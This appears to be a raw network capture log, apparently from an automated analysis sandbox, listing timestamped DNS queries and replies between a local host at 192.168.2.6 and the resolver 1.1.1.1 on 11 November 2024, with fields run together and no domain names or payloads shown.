                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.297101021 CET5549453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.297239065 CET5117653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.297374964 CET5917853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.297518969 CET5102553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.297668934 CET6468053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.297806025 CET6072153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.297996998 CET5089053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.298548937 CET6332653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.298904896 CET5279453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.299509048 CET5554653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.672086000 CET53497141.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.672455072 CET53627811.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.672480106 CET53513831.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.673300982 CET53513701.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.673341990 CET53566421.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.673794985 CET53526431.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.673819065 CET53531671.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.673935890 CET53639291.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.673964977 CET53536911.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.674320936 CET53599051.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.674370050 CET53608781.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.674938917 CET53615041.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.675065994 CET53541411.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.675076008 CET53609671.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.682511091 CET53578651.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.683378935 CET53570811.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.694231033 CET53607961.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.694554090 CET53574261.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.694566965 CET53521731.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.706695080 CET5820553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.707467079 CET5775953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.707623959 CET5442053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.707811117 CET6114553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.707942963 CET6521953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.708142996 CET5591753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.708173037 CET5173053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.708362103 CET5789953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.708457947 CET6000853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.709100008 CET5284653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.713746071 CET5739253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.715255976 CET5195153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.716506958 CET6447153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.717144012 CET4947353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.717736959 CET53577591.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.717900038 CET5437753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.718512058 CET53600081.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.719010115 CET53652191.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.719434023 CET53544201.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.719629049 CET53528461.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.719656944 CET53559171.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.721544981 CET5714453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.721851110 CET5281753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.723180056 CET53573921.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.723701000 CET6181053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.724472046 CET53494731.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.726783037 CET53644711.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.728990078 CET53543771.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.731777906 CET53571441.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.733505964 CET53528171.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.738425970 CET53582051.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.740222931 CET53517301.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.740231991 CET53578991.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.740250111 CET53611451.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.744082928 CET6470553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.746213913 CET53519511.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.755603075 CET53618101.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.777965069 CET53647051.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.290885925 CET5206753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.292977095 CET5292253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.296391010 CET6303353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.303109884 CET53529221.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.310357094 CET53520671.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.327938080 CET53630331.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.340756893 CET5510653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.341058016 CET6127553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.348854065 CET53551061.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.351047993 CET53612751.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.356749058 CET5989053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.389003992 CET53598901.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.419492960 CET6070153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.419709921 CET6129453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.431684017 CET53607011.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.432456017 CET53612941.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.150921106 CET6205353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.163419962 CET53620531.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.189436913 CET5152453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.192823887 CET6203653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.193953037 CET5681153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.197180986 CET5497553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.200634003 CET6302253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.207483053 CET53549751.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.209316015 CET5403753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.210484028 CET6453953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.212903023 CET5329353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.216310978 CET5923553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.217775106 CET53568111.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.218430996 CET53630221.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.219274998 CET53540371.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.220201969 CET6287153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.221019030 CET5347853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.221983910 CET53645391.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.222449064 CET53515241.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.222704887 CET5039053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.223084927 CET53532931.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.224440098 CET53620361.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.227435112 CET53592351.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.229922056 CET53628711.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.232316971 CET53534781.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.233146906 CET53503901.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.252037048 CET6009753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.264353991 CET53600971.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.293770075 CET5756453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.294296026 CET5233853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.281217098 CET5072253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.282478094 CET5360753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.283701897 CET5630853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.287636042 CET4998953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.288642883 CET53523011.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.289406061 CET6125553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.290715933 CET5468953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.292002916 CET53507221.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.294174910 CET53563081.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.299182892 CET53499891.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.299653053 CET53612551.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.300775051 CET53546891.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.310890913 CET53604991.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.313435078 CET53536071.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.561220884 CET53617921.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.767069101 CET5412153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.767160892 CET6270653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.767482042 CET5155953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.767868996 CET5095953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.768801928 CET5253153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.768906116 CET5802653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.769179106 CET5402453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.769345045 CET4962853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.769623995 CET6348153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.769812107 CET4931353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.770323992 CET5200253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.770591974 CET5525753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.770853043 CET5578853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.771130085 CET6366853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.771368027 CET5936953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.771675110 CET5071853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.771861076 CET5080053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.772047997 CET6443353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.776245117 CET53580261.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.777477980 CET53627061.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.777745962 CET53515591.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.777885914 CET53509591.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.778423071 CET53593691.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.779073000 CET53525311.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.779654980 CET53496281.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.780297041 CET53493131.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.780977011 CET53634811.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.781462908 CET53552571.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.781655073 CET53636681.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.782037973 CET53507181.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.783345938 CET53644331.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.785840988 CET53541211.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.786385059 CET6111753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.787600994 CET6278253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.787798882 CET5951753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.787843943 CET5969553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.787997961 CET5181253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.788017035 CET5693553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.788193941 CET6199053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.789290905 CET53557881.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.792309046 CET5716853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.793225050 CET5475053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.793586969 CET5823853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.797625065 CET53627821.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.797785044 CET53569351.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.797836065 CET53619901.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.798408985 CET53518121.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.798422098 CET53596951.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.800004959 CET53540241.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.802431107 CET53520021.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.803117037 CET53508001.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.803165913 CET53571681.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.804626942 CET53547501.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.817600012 CET53611171.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.818445921 CET53595171.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.826853037 CET53582381.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.827876091 CET5501153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.828193903 CET5882053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.828193903 CET5591653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.828399897 CET6050653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.828533888 CET5192053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.829437017 CET4964953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.829487085 CET5534553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.829674006 CET5250853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.830034971 CET5777653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.835407972 CET53559161.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.838274956 CET53588201.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.839874029 CET53519201.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.842573881 CET53525081.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.859597921 CET53550111.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.859709978 CET53605061.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.860172987 CET53496491.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.860373974 CET53553451.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.861128092 CET53577761.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.880908012 CET6090953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.891007900 CET53609091.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.948878050 CET5503053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.958767891 CET53550301.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:20.004805088 CET5035953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:20.011324883 CET5023053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:20.015002012 CET5257853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:20.015501022 CET53503591.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:20.022157907 CET53502301.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:20.024502039 CET53525781.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:20.026611090 CET5670953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:20.027137995 CET6429853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:20.036796093 CET53642981.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:20.038379908 CET53567091.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.238421917 CET53491991.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.241547108 CET53500771.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.242862940 CET5856353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.263006926 CET53549281.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.350075006 CET53585631.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.802767038 CET5174553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.806097984 CET5733053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.807919979 CET5121653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.808532000 CET5858353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.818212986 CET5662153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.819375992 CET53585831.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.823543072 CET5985653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.823946953 CET5044053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.830056906 CET53566211.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.834352016 CET53517451.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.834837914 CET53504401.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.838169098 CET53573301.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.839184046 CET53512161.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.840456009 CET5780053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.854821920 CET53598561.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.862776041 CET5547753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.867217064 CET4940153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.868154049 CET5834353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.869241953 CET6250153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.869612932 CET5857053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.872214079 CET53578001.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.873802900 CET53554771.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.875363111 CET5584253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.876816034 CET5662753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.878077030 CET53494011.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.878946066 CET53583431.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.879331112 CET53625011.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.879690886 CET53585701.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.884721041 CET53558421.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.888292074 CET53566271.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.889777899 CET5810953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.891088009 CET6112753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.893723011 CET6240553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.895461082 CET5420853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.900455952 CET53581091.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.902636051 CET53611271.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.904681921 CET53624051.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.926789999 CET53542081.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.928287029 CET6408653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.928631067 CET6474853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.937047958 CET5941053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.937215090 CET5836653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.937572002 CET6033253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.937891006 CET6165553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.938045979 CET6496253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.938215017 CET5008453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.938323975 CET53640861.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.938646078 CET5925553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.940165997 CET53647481.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.947307110 CET53603321.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.947918892 CET53583661.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.947957039 CET53616551.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.948354959 CET53500841.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.948983908 CET5509653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.948988914 CET53649621.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.949187994 CET5675253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.950498104 CET6335153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.950700045 CET5076053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.950841904 CET5699453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.950985909 CET5589553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.951155901 CET6349653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.951698065 CET6508353192.168.2.61.1.1.1
